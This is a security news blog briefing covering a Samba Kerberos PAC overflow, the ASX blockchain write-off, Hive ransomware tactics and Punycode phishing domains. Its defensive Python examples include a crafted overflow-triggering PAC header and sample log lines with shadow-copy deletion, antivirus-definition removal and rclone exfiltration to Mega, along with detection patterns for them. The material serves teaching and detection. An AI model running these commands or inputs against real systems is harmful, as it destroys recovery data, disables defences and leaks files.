Blog entry by Les Bell

by Les Bell - Friday, 18 November 2022, 7:51 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Samba Project Releases Patch for Buffer Overflow

The Samba project has released patches for a heap buffer overflow, CVE-2022-42898, in the Privilege Attribute Certificate (PAC) parsing code of the Heimdal Kerberos library bundled with Samba (the same CVE covers MIT Kerberos, which has the equivalent flaw). The bug is an integer multiplication overflow when calculating how many bytes to allocate for the buffer into which the PAC will be parsed: the buffer count taken from the ticket is multiplied by the 16-byte size of each PAC buffer descriptor. On a 32-bit system the product wraps, so an undersized buffer is allocated and the loop that then copies the descriptors writes 16-byte chunks of attacker-controlled data past its end, corrupting the heap.

By submitting a Kerberos ticket containing a carefully crafted PAC to a non-Active Directory KDC, an attacker can have that PAC passed on to a service inside the service ticket, where it is parsed by the vulnerable code.

The overflow does not occur on 64-bit systems, where the product fits in a size_t; however, many low-end NAS devices run 32-bit builds of Samba and should be patched as soon as their vendors release updated firmware.
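To see the arithmetic concretely, here is an added example, written for this briefing and not Heimdal or Samba code, that models the PACTYPE header as laid out in MS-PAC: a 4-byte buffer count, a 4-byte version, then one 16-byte descriptor per buffer. A Python integer does not wrap, so the 32-bit size_t is modelled with a mask; the function names are assumptions, and the two sample PACs are constructed rather than captured from any system.

```python
import struct
from typing import List, Optional, Tuple

# Added example, not Heimdal or Samba code: models the PAC header size
# arithmetic that wraps on a 32-bit build, and the check that stops it.
# Layout follows the MS-PAC PACTYPE header; function names are hypothetical.

PAC_HEADER_SIZE = 8           # cBuffers (4 bytes) + Version (4 bytes)
PAC_INFO_BUFFER_SIZE = 16     # ulType (4) + cbBufferSize (4) + Offset (8)
UINT32_MAX = 0xFFFFFFFF
# Largest count whose descriptor array plus header still fits in 32 bits.
MAX_SAFE_BUFFERS = (UINT32_MAX - PAC_HEADER_SIZE) // PAC_INFO_BUFFER_SIZE   # 0x0FFFFFFF


def alloc_size_32bit_unchecked(num_buffers: int) -> int:
    """Allocation size as a 32-bit size_t computes it, with no overflow check.

    Python integers do not wrap, so the mask models the C arithmetic.
    """
    return (PAC_HEADER_SIZE + num_buffers * PAC_INFO_BUFFER_SIZE) & UINT32_MAX


def alloc_size_checked(num_buffers: int, input_len: int) -> Optional[int]:
    """Return the allocation size, or None if the count cannot be trusted."""
    if num_buffers > MAX_SAFE_BUFFERS:
        return None                       # product would wrap a 32-bit size_t
    size = PAC_HEADER_SIZE + num_buffers * PAC_INFO_BUFFER_SIZE
    if size > input_len:
        return None                       # claims more descriptors than bytes present
    return size


def parse_pac_header(blob: bytes) -> List[Tuple[int, int, int]]:
    """Parse the PACTYPE header; return (ulType, cbBufferSize, Offset) per entry.

    Raises ValueError for a header that the hardened check rejects.
    """
    if len(blob) < PAC_HEADER_SIZE:
        raise ValueError("truncated PAC header")
    num_buffers, _version = struct.unpack_from("<II", blob, 0)
    if alloc_size_checked(num_buffers, len(blob)) is None:
        raise ValueError(f"untrusted buffer count {num_buffers:#x}")
    entries = []
    for i in range(num_buffers):           # safe: count already bounded by len(blob)
        off = PAC_HEADER_SIZE + i * PAC_INFO_BUFFER_SIZE
        ul_type, cb_size, data_off = struct.unpack_from("<IIQ", blob, off)
        if data_off + cb_size > len(blob):
            raise ValueError(f"entry {i} points outside the PAC")
        entries.append((ul_type, cb_size, data_off))
    return entries


def is_rejected(blob: bytes) -> bool:
    """True if the hardened parser refuses the PAC."""
    try:
        parse_pac_header(blob)
    except ValueError:
        return True
    return False


# Constructed sample PACs (not captured from any system).
# Benign: two descriptors (types 6 and 7 are the server and KDC checksums)
# followed by 32 bytes of payload that the descriptors point at.
BENIGN_PAC = (
    struct.pack("<II", 2, 0)
    + struct.pack("<IIQ", 6, 16, 40)
    + struct.pack("<IIQ", 7, 16, 56)
    + bytes(32)
)
# Malicious: cBuffers = 0x10000001, so 0x10000001 * 16 wraps to 16 in 32 bits
# and unchecked code would allocate only 24 bytes for the whole descriptor array.
MALICIOUS_PAC = struct.pack("<II", 0x10000001, 0) + bytes(32)


if __name__ == "__main__":
    print("unchecked 32-bit size for malicious count:",
          alloc_size_32bit_unchecked(0x10000001))        # 24
    print("benign entries:", parse_pac_header(BENIGN_PAC))
    print("malicious rejected:", is_rejected(MALICIOUS_PAC))
```

The hardened version rejects any count whose product cannot be represented and, independently, any count that claims more descriptors than the ticket actually carries. The second check matters even on 64-bit builds, where the product does not wrap but an absurd count still drives an oversized allocation and a read past the end of the input.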

Uncredited, Samba Security Releases, web page, 15 November 2022. Available online at https://www.samba.org/samba/history/security.html.

ASX Halts Blockchain Project, Takes $A250 Million Hit

In a sign that blockchain technology is well down the back side of the hype cycle, the Australian Stock Exchange (ASX) has announced that it has halted its major project to replace CHESS (Clearing House Electronic Subregister System) with a blockchain-based system. The decision follows completion of an independent review conducted by Accenture, as well as its own internal assessment.

The Accenture review identified four underlying drivers which contribute to the challenges the project was facing:

  • Latency - while all distributed systems have inherent latency, the architecture makes it worse because of the round-trip data flow of submitting a transaction to the client node, writing the data to the ledger, then distributing it back to the client nodes and to the CHESS replacement application.
  • Concurrency - contention arises when multiple in-flight transactions target the same data set, and batching or grouping transactions still forces serialised processing for some workflows.
  • Batch processing - the use of batch processing to deal with the concurrency, scaling and other non-functional issues is limited by constraints which need further investigation.
  • Technical constraints - batch processing is constrained by limits in the ledger API and the VMware Blockchain product used.

All in all, the current design contributes to challenges in achieving scalability, resiliency and supportability. Meanwhile, the existing CHESS application "remains secure and stable, and is performing well", with the ASX planning to continue to invest in its capacity and resilience. As the endless litany of cryptocurrency exchange collapses, rugpulls and other thefts and frauds continues to erode trust in blockchain's flagship application, one is left wondering whether blockchain isn't just a solution desperately searching for a problem.

ASX Market Announcements Office, ASX Will Reassess All Aspects of the CHESS Replacement Project and Derecognise Capitalised Software of $245-255 Million Pre-Tax in 1H23, market announcement, 17 November 2022. Available online at https://cdn-api.markitdigital.com/apiman-gateway/ASX/asx-research/1.0/file/2924-02599209-2A1414213?access_token=83ff96335c2d45a094df02a206a39ff4.

FBI, CISA, Department of Health and Human Services Warn of Hive Ransomware

A joint Cybersecurity Advisory issued by the FBI, the US Cybersecurity & Infrastructure Security Agency (CISA) and the Department of Health and Human Services provides details of the IOCs and TTPs that FBI investigations have attributed to the Hive ransomware group.

To date, Hive actors have hit over 1,300 companies worldwide, netting approximately $US100 million in ransom payments, says the FBI, using the ransomware-as-a-service (RaaS) model in which the developers provide the malware and affiliates conduct the actual attacks. Since June 2021, these affiliates have targeted a wide range of private and public sector organizations, especially the healthcare and public health sector.

Initial intrusion vectors vary with the affiliate involved; they include compromising remote access services such as RDP and VPNs, often with single-factor logins. Affiliates have also bypassed multi-factor authentication on FortiOS servers by exploiting CVE-2020-12812, which allowed them to log in to the SSL VPN without being prompted for the FortiToken second factor simply by changing the case of the username. Other vectors are phishing e-mails with malicious attachments and exploitation of Microsoft Exchange vulnerabilities (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523, the ProxyShell chain).

The Hive ransomware itself uses a variety of defence-evasion techniques, such as removing virus definitions and disabling antivirus programs, and it deletes Volume Shadow Copies and disables backup processes to impede recovery. Exfiltration is performed with Rclone pushing data to the Mega.nz cloud storage service.
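The tactics in the paragraph above lend themselves to detection on process-creation telemetry. The following is an added example, not code from the CISA advisory: a small rule set mapped to ATT&CK techniques (T1490 Inhibit System Recovery, T1562.001 Impair Defenses, T1567.002 Exfiltration to Cloud Storage) run over constructed key=value event lines. The log format, host names, user names and command lines are assumptions made for the example, and the commands matched are common ways of carrying out each tactic rather than a claim about any specific Hive sample.

```python
import re
from typing import Dict, List, Tuple

# Added example, not from the CISA advisory or a Hive sample: detection rules
# for shadow-copy deletion, antivirus tampering and rclone-to-Mega exfiltration,
# run over constructed process-creation events. All names are assumptions.

# Each rule: (ATT&CK technique, description, regex over the lower-cased command line).
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("T1490", "shadow copy deletion (inhibit recovery)",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete")),
    ("T1490", "boot recovery disabled",
     re.compile(r"bcdedit(\.exe)?.*recoveryenabled\s+no")),
    ("T1562.001", "antivirus definitions removed",
     re.compile(r"mpcmdrun(\.exe)?.*-removedefinitions")),
    ("T1562.001", "real-time antivirus protection disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$?true")),
    ("T1567.002", "rclone transfer to Mega cloud storage",
     re.compile(r"\brclone(\.exe)?\b.*\bmega\b")),
]

# key=value pairs; values containing spaces are double-quoted.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in FIELD_RE.finditer(line)}


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) match, in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        cmd = ev.get("cmdline", "").lower()
        for technique, desc, pattern in RULES:
            if pattern.search(cmd):
                findings.append({"technique": technique, "desc": desc,
                                 "host": ev.get("host", "?"), "user": ev.get("user", "?"),
                                 "cmdline": ev.get("cmdline", "")})
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per ATT&CK technique."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["technique"]] = counts.get(f["technique"], 0) + 1
    return counts


# Constructed sample events (not real telemetry). Lines 1 and 6 are benign.
SAMPLE_EVENTS = [
    r'ts=2022-11-17T03:10:02Z host=FS01 user=CORP\jsmith image="C:\Windows\System32\vssadmin.exe" cmdline="vssadmin.exe list shadows"',
    r'ts=2022-11-17T03:12:44Z host=FS01 user=CORP\svc-backup image="C:\Windows\System32\vssadmin.exe" cmdline="vssadmin.exe delete shadows /all /quiet"',
    r'ts=2022-11-17T03:12:51Z host=FS01 user=CORP\svc-backup image="C:\Windows\System32\wbem\wmic.exe" cmdline="wmic.exe shadowcopy delete"',
    r'ts=2022-11-17T03:13:05Z host=FS01 user=CORP\svc-backup image="C:\Program Files\Windows Defender\MpCmdRun.exe" cmdline="MpCmdRun.exe -RemoveDefinitions -All"',
    r'ts=2022-11-17T03:20:19Z host=FS01 user=CORP\svc-backup image="C:\Users\Public\rclone.exe" cmdline="rclone.exe copy \\FS01\Finance mega:exfil --transfers 8"',
    r'ts=2022-11-17T08:00:00Z host=WS17 user=CORP\backupadmin image="C:\Tools\rclone.exe" cmdline="rclone.exe sync D:\Reports corp-onedrive:Reports"',
]


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["technique"]:10} {h["host"]} {h["user"]}: {h["cmdline"]}')
    print(summarize(hits))
```

On real telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) the same patterns apply. The rclone rule keys on the remote name, so tune it to whatever cloud remotes your environment legitimately uses; the shadow-copy and definition-removal rules should fire rarely enough on a file server to be worth an immediate page.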

The advisory provides a full description, along with IOCs such as filenames, events, processes and IP addresses, and maps the observed behaviour to MITRE ATT&CK techniques. It also provides recommended mitigations.

Cybersecurity & Infrastructure Security Agency, #StopRansomware: Hive Ransomware, Alert (AA22-321A), 17 November 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-321a.

Phishing Domains Use Punycode to Escape Notice

A nice piece from infosec blogger Brian Krebs describes how the Disneyland Team financial cybercrime group has registered multiple look-alike domains that are near-indistinguishable from the real ones by using Punycode, the ASCII-compatible encoding (RFC 3492) that Internationalized Domain Names use to carry Unicode characters, including non-Latin alphabets such as Cyrillic, in DNS labels prefixed xn--.

By using letters carrying diacritics, such as acutes, graves and umlauts, and especially the visually unobtrusive single dot below letters such as 'a' and 'e', the group has been able to direct victims to domains which, in the browser's address bar, are virtually indistinguishable from the correct address. Whether the decoded Unicode form or the raw xn-- string is displayed depends on the browser's IDN display policy, so the trick works best against browsers and contexts that render the decoded form.
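As an added example, not code from Krebs's post, the following Python decodes Punycode labels and reduces each label to an ASCII skeleton by stripping combining marks (which removes the dots below) and folding a handful of Cyrillic look-alikes, then compares the result against a watchlist of brand domains; it also flags labels that mix scripts, which legitimate brand domains almost never do. The watchlist and sample domains are constructed, and the confusable map is a small illustrative subset of the Unicode confusables data, not the full table.

```python
import unicodedata
from typing import Dict, List, Optional, Set

# Added example, not from Krebs's post: Punycode decoding plus a simplified
# homograph check. Watchlist, sample domains and the confusable subset are
# assumptions made for the example.

# A few Cyrillic letters whose glyphs match Latin ones (illustrative subset only).
CONFUSABLES: Dict[str, str] = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",
}


def to_unicode(domain: str) -> str:
    """Decode xn-- (Punycode) labels; ASCII labels pass through unchanged."""
    out = []
    for label in domain.lower().split("."):
        if label.startswith("xn--"):
            out.append(label[4:].encode("ascii").decode("punycode"))
        else:
            out.append(label)
    return ".".join(out)


def to_ascii(domain: str) -> str:
    """Encode non-ASCII labels as Punycode, the form that appears on the wire."""
    out = []
    for label in domain.lower().split("."):
        if label.isascii():
            out.append(label)
        else:
            out.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(out)


def skeleton(label: str) -> str:
    """Strip diacritics (including dots below) and fold known confusables."""
    decomposed = unicodedata.normalize("NFD", label)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    folded = "".join(CONFUSABLES.get(c, c) for c in stripped)
    return unicodedata.normalize("NFKC", folded).lower()


def scripts(label: str) -> Set[str]:
    """Scripts used by the letters of a label, taken from Unicode character names."""
    found = set()
    for c in label:
        if c.isalpha():
            found.add(unicodedata.name(c, "UNKNOWN").split(" ")[0])
    return found


def check_domain(domain: str, watchlist: Set[str]) -> Optional[str]:
    """Return a reason if the domain looks like a homograph, else None."""
    decoded = to_unicode(domain)
    skel = ".".join(skeleton(label) for label in decoded.split("."))
    if skel in watchlist and skel != decoded:
        return f"{domain} renders like {skel} but is a different domain"
    mixed = [label for label in decoded.split(".") if len(scripts(label)) > 1]
    if mixed:
        return f"{domain} mixes scripts in label(s) {mixed}"
    return None


def scan(domains: List[str], watchlist: Set[str]) -> Dict[str, str]:
    """Map each flagged domain to its reason."""
    results = {}
    for d in domains:
        reason = check_domain(d, watchlist)
        if reason:
            results[d] = reason
    return results


# Constructed samples: the real brand, a dot-below look-alike (as sent, in
# Punycode), a Cyrillic look-alike, and a mixed-script label not on the watchlist.
WATCHLIST = {"examplebank.com"}
SAMPLE_DOMAINS = [
    "examplebank.com",
    to_ascii("\u1eb9xamplebank.com"),    # Latin e with dot below
    "\u0435xamplebank.com",             # Cyrillic ie in place of Latin e
    "p\u0430ypal-login.com",            # Latin p + Cyrillic a
]


if __name__ == "__main__":
    for d, why in scan(SAMPLE_DOMAINS, WATCHLIST).items():
        print(f"{d} -> {to_unicode(d)}: {why}")
```

The skeleton step is deliberately crude: production checks should use the full Unicode confusables data (TR39) and a whole-script confusable test, and should run on the decoded form of every domain seen in mail and proxy logs, since the xn-- form is what actually appears there.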

Krebs, Brian, Disneyland Malware Team: It's a Puny World After All, blog post, 16 November 2022. Available online at https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
